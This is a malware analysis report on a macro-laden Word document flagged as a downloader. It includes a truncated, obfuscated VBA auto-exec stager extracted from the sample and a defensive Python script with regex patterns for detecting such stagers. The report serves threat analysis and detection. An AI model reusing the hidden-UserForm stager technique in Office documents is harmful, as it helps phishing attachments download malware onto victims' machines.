Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 370afbfc36044c2c…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 199.6 KB
Created: 2019-12-19 01:42:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: 2b44ec3d6c0940b3038950038be745db
SHA-1: 7c9a2b62384020f470c9ec5a57786810270a4a7e
SHA-256: 370afbfc36044c2ca0cf729e11381e633617f4a67e0a3c88ebe4a1959a991c33
Risk score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The sample carries VBA macros: a Document_Open auto-exec entry point in the ThisDocument module (Bhhujcbq, which also hosts an MSForms TextBox control named Guqlecwzw) and a UserForm module (Vyeoqakxxt) whose members are concatenated at run time by the Oinarhrpwwxy module. That layout is the hidden-UserForm command-stager shape and is characteristic of a macro downloader; the ClamAV signature 'Doc.Downloader.Sagent-7465099-0' agrees. The decoded source is padded with junk declarations and dead assignments (random integers, lorem-ipsum and first-name strings), so the real logic is the handful of statements that read control and form properties. The CreateObject call reported by the heuristics lies past the truncated preview, so the COM object used and any download URL are not recoverable from this report; the most likely function is to assemble a command from the staged text and hand it to that object to download and execute a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Downloader.Sagent-7465099-0 (critical, CLAMAV_DETECTION)
    ClamAV signature match; the family label is a downloader, consistent with the macro shape below.
  • VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
    Document contains VBA macro code.
  • VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER)
    An auto-exec macro creates a COM object from a decoded variable and reconstructs the command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set. It is a social-engineering macro rather than an Office CVE exploit primitive: nothing runs unless the user enables macros.
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    The Bhhujcbq module (ThisDocument) defines Private Sub Document_open(), so the chain starts as soon as the document is opened with macros enabled.
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    The macro instantiates a COM object by ProgID at run time. The call itself lies past the truncated preview, so the ProgID is not recoverable from this report.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This rule catches p-code-only or source-extraction-failure macro documents where no readable source is available; here it corroborates the source-level findings.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for the channel (macro, JS, link annotation, document body, ...) that reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace found in most Office files and does not indicate any network contact.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   11036 bytes
SHA-256 (macros.bas): a70c818013bc4aa9e164ecbb4ba43e0ffe40f72bacf7186788ebab95c41222ef
Preview: first 1,000 lines of the extracted script (the listing is truncated below)
Attribute VB_Name = "Bhhujcbq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Guqlecwzw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Wqhxgpmwiqeve = Xbbotshmi
Vqsdhzec = 396
Oabjzfnve = ("Eos.")
Ueivmgxho = (656)
Dim Getvdfjfrbwzj As String
Dim Ftnurdovblkhv As Boolean
Dim Vneptxpeb As Integer
Dim Zlfyfyvmbd As Boolean
Dim Murjsktxomjg As Integer
Dim Uhcppmnfedqc As Integer
Dim Mirdburubo As Boolean
Hjxnbypjenkm = (583)
Dim Ghqnsqdil As Boolean
Gfodafnsvedh = ("Est tempora recusandae.")
Rmwgyyfo = (909)
Dim Jenvgqyystu As String
Feiwttcc = Lbdhbngorlatv
Leffoxhylqcq = Vqljecudjx
Edialiqeio = "Ut laborum asperiores adipisci neque aut voluptas."
Lbddsqzxecwup = 293
   Rnjpdlae = Vnsbliid
Wavrxtqcsvtq = 61
Fnpnynpxyb = ("Amelia")
Byrvyori = (925)
Dim Ssskuxmtkfr As Integer
Dim Ysvelcyctcvr As String
Dim Wxeznfpvxv As Double
Dim Rkeqjjvdtccj As Boolean
Dim Ioyqwtdmq As String
Dim Geagdvaqt As String
Dim Ycsmvoruvvt As String
Bwgyuoeuildfv = (180)
Dim Gcsmvuqwxkx As Integer
Vaknwdegpbve = ("Earum.")
Prohaqansdgm = (320)
Dim Aioxzjyibq As Boolean
Sjrbwhpaaej = Yvihggjatggmy
Uhqyyjyqvrgzx = Vzlaaoqauk
Ydloycsgtok = "Iste rerum adipisci fuga."
Aenqahmzjlg = 172
   Xbsfnwonrotla = Kttpxxvjlnj
Yuteibyzsgn = 967
Rztfitowi = ("Est.")
Ktccsgrehypxv = (521)
Dim Yrrrmfbq As Boolean
Dim Pgfpatpmuuozw As String
Dim Pjghccyqeu As Boolean
Dim Qvticvfca As Integer
Dim Hfzkavpzukf As Boolean
Dim Vjeurqavdnzr As String
Dim Ldqeldvzcc As Double
Upucvkyyntrll = (134)
Dim Sdratzjdwd As String
Tavgbdtvkabs = ("Id repudiandae dolore eum numquam voluptas.")
Cyrlftbrcvkc = (913)
Dim Llyyqqexrnqis As Double
Sbzlaxlm = Ltbyavyeukybd
Oegevxalrjtlr = Zzoaewdz
Rdxfcqyxmlsf = "Sit blanditiis ducimus."
Akhkogkhgtk = 61
Pihlzkcicga
End Sub

Attribute VB_Name = "Vyeoqakxxt"
Attribute VB_Base = "0{9073FB39-2E1C-4746-83A2-96A69A51531E}{01A1C874-C51B-4ABD-824F-0A2D001C09C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Oinarhrpwwxy"
Function Ujjteelnxf()
   Iczpkrbxsfrj = Cboniugn
Rdyqpfkuf = 738
Pxftmuoc = ("Alton")
Hogqsoqjmou = (794)
Dim Xhskinuxeham As Double
Dim Tvzrlcqkor As Integer
Dim Rtktripehmtjf As Boolean
Dim Sdhfdoewn As Boolean
Dim Jxcmsakmvanlq As Integer
Dim Abhcpmvwyhhmw As Boolean
Dim Wwgtysbuts As Boolean
Uferrmhodplx = (504)
Dim Bdfloneidre As Integer
Eygnjptbqtpq = ("Ellen")
Ujhkjjkqyph = (261)
Dim Plbnmvscqw As Double
Hrmkkpvp = Zwgvmknzrf
Eqpgcugm = Ficsxgozmon
Fgriipqevv = "Pariatur veniam beatae iste vitae ea voluptates enim."
Wvdnailglrx = 453
Ewajapcv = Bhhujcbq.Guqlecwzw
   Gwfxeyindhu = Noolpphajhbdh
Vtwkoathq = 631
Auafomnnd = ("Sequi aperiam expedita deleniti suscipit corporis inventore.")
Vthomxoeuw = (498)
Dim Sjkkfyug As Integer
Dim Hpnadtopuvli As Double
Dim Caovtmzm As Double
Dim Hwdbioinodm As Boolean
Dim Luvpebes As String
Dim Iifkznlrvo As Boolean
Dim Gqnhgmyuupjz As Double
Xwvkwyyl = (318)
Dim Cejzdlrdetne As Integer
Vrupqsyghypow = ("Alberto")
Yuvvuebdyqiy = (701)
Dim Jmtuypfdiubu As Double
Lkppglfysjist = Zitslylwuyvn
Btzifsobts = Kujmfwrijmi
Yanurlxkmq = "Vitae."
Knvhypbxvn = 938
Anrqtfgp = Ewajapcv + Vyeoqakxxt.Qvtysshpkvvk + Vyeoqakxxt.Mcgxwclnbn + Vyeoqakxxt.Raokfqzn
   Izugkvgxkaej = Fnonjqyisl
Ksmawuuv = 791
Xbrvovzmbpv = ("Alison")
Uokrwuah = (570)
Dim Kknljdjpepqpm As Double
Dim Bcigksexrrm As String
Dim Xbthodhk As Boolean
Dim Qiraqxlebo As Integer
Dim Srayffnwtxqg As Boolean
Dim Wjbioczs As Boolean
Dim Ssnzgnkyycjbg As Boolean
Bxfqsskjnbbdt = (380)
Dim Vzydgmro As Integer
Nshouudlj = ("Leo")
Ubafhjaxe = (969)
Dim Yxhjcdjmjjp As Integer
Adutgyrjm = Xyxydrql
Tkgkrabxdwfrv 
... (truncated)
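The preview above is mostly padding: unused Dim declarations, integer and lorem-ipsum assignments, and copies between names that occur nowhere else. The statements that carry the stager are the ones that read the Guqlecwzw control on ThisDocument and the members of the Vyeoqakxxt UserForm. The following script is an added example, not part of this report and not oletools code; it strips that padding by identifier frequency and then checks a module set for the pieces the OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER, OLE_VBA_DOCOPEN and OLE_VBA_CREATEOBJ rules describe. The input is a constructed excerpt of the preview (module, control and identifier names copied from it); the final Set ... CreateObject(...) line is hypothetical, because the preview is truncated before the CreateObject call the heuristics report, and the assumption that a VB_Base of the form 0{GUID}{GUID} marks a UserForm is taken from how the Vyeoqakxxt module is declared above.

```python
import re                                   # added example, not the report's own code
from collections import Counter

# Constructed excerpt of the macros.bas preview (names copied from it, most padding
# dropped). The CreateObject line is HYPOTHETICAL: the preview is truncated before
# the call that OLE_VBA_CREATEOBJ reports, so its real form is not known.
SAMPLE_VBA = r'''Attribute VB_Name = "Bhhujcbq"
Attribute VB_Control = "Guqlecwzw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Wqhxgpmwiqeve = Xbbotshmi
Vqsdhzec = 396
Oabjzfnve = ("Eos.")
Dim Getvdfjfrbwzj As String
Pihlzkcicga
End Sub

Attribute VB_Name = "Vyeoqakxxt"
Attribute VB_Base = "0{9073FB39-2E1C-4746-83A2-96A69A51531E}{01A1C874-C51B-4ABD-824F-0A2D001C09C8}"

Attribute VB_Name = "Oinarhrpwwxy"
Function Ujjteelnxf()
   Iczpkrbxsfrj = Cboniugn
Dim Xhskinuxeham As Double
Ewajapcv = Bhhujcbq.Guqlecwzw
Yanurlxkmq = "Vitae."
Anrqtfgp = Ewajapcv + Vyeoqakxxt.Qvtysshpkvvk + Vyeoqakxxt.Mcgxwclnbn + Vyeoqakxxt.Raokfqzn
Set Hypothetical = CreateObject(Anrqtfgp)
End Function
'''

IDENT_RE = re.compile(r'\b[A-Za-z_]\w*\b')
DIM_RE = re.compile(r'^\s*Dim\s+(\w+)\s+As\s+\w+\s*$', re.I)
LIT_RE = re.compile(r'^\s*(\w+)\s*=\s*\(?\s*(?:\d+|"[^"]*")\s*\)?\s*$')  # X = 396, X = ("Eos.")
COPY_RE = re.compile(r'^\s*(\w+)\s*=\s*(\w+)\s*$')                        # X = Y
MEMBER_RE = re.compile(r'\b(\w+)\.(\w+)\b')
AUTOEXEC_RE = re.compile(r'^\s*(?:Private\s+|Public\s+)?Sub\s+(Document_Open|Document_Close|'
                         r'AutoOpen|Auto_Open|AutoExec|AutoClose|Workbook_Open)\b', re.I | re.M)
CREATEOBJ_RE = re.compile(r'\bCreateObject\s*\(\s*([^)]*)\)', re.I)
SPLITJOIN_RE = re.compile(r'\b(?:Split|Join)\s*\(', re.I)

def strip_junk(source):
    """Drop Dim/literal/copy statements whose identifiers occur nowhere else (the
    padding in the preview); lines that reuse a name, touch a module or a control,
    or call a procedure (Pihlzkcicga) survive."""
    counts = Counter(t.lower() for t in IDENT_RE.findall(source))
    once = lambda name: counts[name.lower()] == 1
    kept = []
    for line in source.splitlines():
        m = DIM_RE.match(line) or LIT_RE.match(line)
        if m and once(m.group(1)):
            continue
        m = COPY_RE.match(line)
        if m and once(m.group(1)) and once(m.group(2)):
            continue
        kept.append(line)
    return '\n'.join(kept)

def parse_modules(source):
    """Split on Attribute VB_Name. A VB_Base of the form 0{GUID}{GUID} is taken to mark
    a UserForm (how Vyeoqakxxt is declared above); VB_Control names a hosted control."""
    modules, cur = {}, None
    for line in source.splitlines():
        name = re.match(r'Attribute VB_Name = "(\w+)"', line)
        ctrl = re.match(r'Attribute VB_Control = "(\w+)', line)
        if name:
            cur = modules.setdefault(name.group(1), {'userform': False, 'controls': set()})
        elif cur is not None and line.startswith('Attribute VB_Base = "0{'):
            cur['userform'] = True
        elif cur is not None and ctrl:
            cur['controls'].add(ctrl.group(1))
    return modules

def classify(source):
    """Collect the pieces the UserForm command-stager rule looks for."""
    modules = parse_modules(source)
    found = {'autoexec': [m.group(1) for m in AUTOEXEC_RE.finditer(source)],
             'createobject_args': [a.strip() for a in CREATEOBJ_RE.findall(source)],
             'split_join': bool(SPLITJOIN_RE.search(source)),
             'userform_refs': [], 'control_refs': []}
    for obj, member in MEMBER_RE.findall(source):
        mod = modules.get(obj)
        if mod and mod['userform']:
            found['userform_refs'].append(obj + '.' + member)
        elif mod and member in mod['controls']:
            found['control_refs'].append(obj + '.' + member)
    return found

def verdict(found):
    """Mirror the report's rule: auto-exec entry point, text assembled from UserForm
    members or hosted controls, and a COM object created from a variable, not a
    string literal. Split/Join is recorded but not required (the preview shows none)."""
    from_variable = any(a and not a.startswith('"') for a in found['createobject_args'])
    staged = bool(found['userform_refs'] or found['control_refs'])
    if found['autoexec'] and from_variable and staged:
        return 'userform-command-stager'
    if found['autoexec'] and found['createobject_args']:
        return 'autoexec-createobject'
    return 'autoexec-only' if found['autoexec'] else 'no-autoexec'

if __name__ == '__main__':
    print(strip_junk(SAMPLE_VBA))
    print(verdict(classify(SAMPLE_VBA)))
```

On the constructed input the stripper keeps 15 of 22 lines, and the only statements left inside the procedures are the bare call Pihlzkcicga, the read of Bhhujcbq.Guqlecwzw, the concatenation of the three Vyeoqakxxt members and the hypothetical CreateObject; the classifier then returns userform-command-stager. To reproduce the report's source extraction on the real sample, oletools' own CLI does the same job at scale (olevba --deobf for decoded source, olevba --show-pcode for the p-code view that the OLE_VBA_PCODE_AUTOEXEC_EXEC rule works from); the frequency-based stripper above is a quick triage aid, not a substitute for reading the full module set.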